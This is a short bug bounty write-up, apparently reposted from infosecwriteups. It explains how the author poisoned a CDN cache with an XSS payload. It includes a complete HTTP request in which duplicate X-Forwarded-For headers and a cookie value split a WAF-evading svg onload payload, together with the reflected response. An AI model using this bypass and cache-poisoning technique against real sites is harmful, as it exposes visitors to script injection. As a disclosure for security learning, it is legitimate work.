How I Made +$16,500 Hacking CDN Caching Servers — Part 2
2022-2-3 00:30:55 Author: infosecwriteups.com(查看原文) 阅读量:22 收藏

Bounty: $2,000

While Google Dorking, i found a particular URL, but this time, was not being cached, but if i added an cacheable extension file (.js , .css) at the end of URL, it would cache the response.

Now, all i needed was to found a XSS. I found an injection point on a Cookie, but WAF would trigger when i added anything after %20

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP was also being reflected on that same script..

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried “X-Forwarded-For” Headers, this way i can close the <script> and avoid WAF, as it would trigger if it detected <[anything]>

This is why you will see 3 “X-Forwarded-For” Headers

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2 
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: >
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After Poisoned an URL with an XSS, an attacker just needed to send it to the victim

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide XSS :D

This was my favorite Cache Poisoning, and it was found on a Public Program, hopefully we can disclose this in the near future :)


文章来源: https://infosecwriteups.com/how-i-made-16-500-hacking-cdn-caching-servers-part-2-4995ece4c6e6?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh